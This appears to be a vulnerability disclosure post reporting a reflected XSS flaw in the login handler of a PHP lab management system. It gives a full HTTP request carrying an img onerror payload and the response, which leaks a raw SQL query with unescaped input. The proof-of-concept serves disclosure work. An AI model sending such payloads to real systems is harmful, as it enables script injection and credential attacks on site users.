## Titles: LMS2024-1.0 XSS-Reflected Information Disclosure ## Author: nu11secur1ty ## Date: 00/04/2024 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#google_vignette ## Reference: https://portswigger.net/web-security/cross-site-scripting ## Description: The value of the username request parameter is copied into the HTML document as plain text between tags. The payload ro2izxggkt was submitted in the username parameter. This input was echoed unmodified in the application's response. STATUS: HIGH- Vulnerability [+]Exploits: - XSS-Reflected: ```xss POST /php-lms/classes/Login.php?f=login HTTP/1.1 Host: pwnedhost.com Accept-Encoding: gzip, deflate, br Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.138 Safari/537.36 Connection: close Cache-Control: max-age=0 Cookie: PHPSESSID=g61goafu1miq2e737ra7dclqml Origin: https://pwnedhost.com X-Requested-With: XMLHttpRequest Referer: https://pwnedhost.com/php-lms/admin/login.php Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="128", "Chromium";v="128" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 Content-Length: 37 username=VLVAuyqjro2iz%3cimg%20src%3da%20onerror%3dalert(1)%3exggkt&password=e3I!x1c!Q7 ``` + [Response] ``` HTTP/1.1 200 OK Date: Fri, 04 Oct 2024 08:27:39 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4 X-Powered-By: PHP/8.2.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 177 Connection: close Content-Type: text/html; charset=UTF-8 {"status":"incorrect","last_qry":"SELECT * from users where username = 'VLVAuyqjro2izxggkt' and password = md5('45ec487cfe5b3bac8e61740ae8dbcd06') "} ``` ## Reproduce: [href](https://www.patreon.com/nu11secur1ty) ## Demo PoC: [href](https://www.patreon.com/nu11secur1ty) ## Time spent: 00:27:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty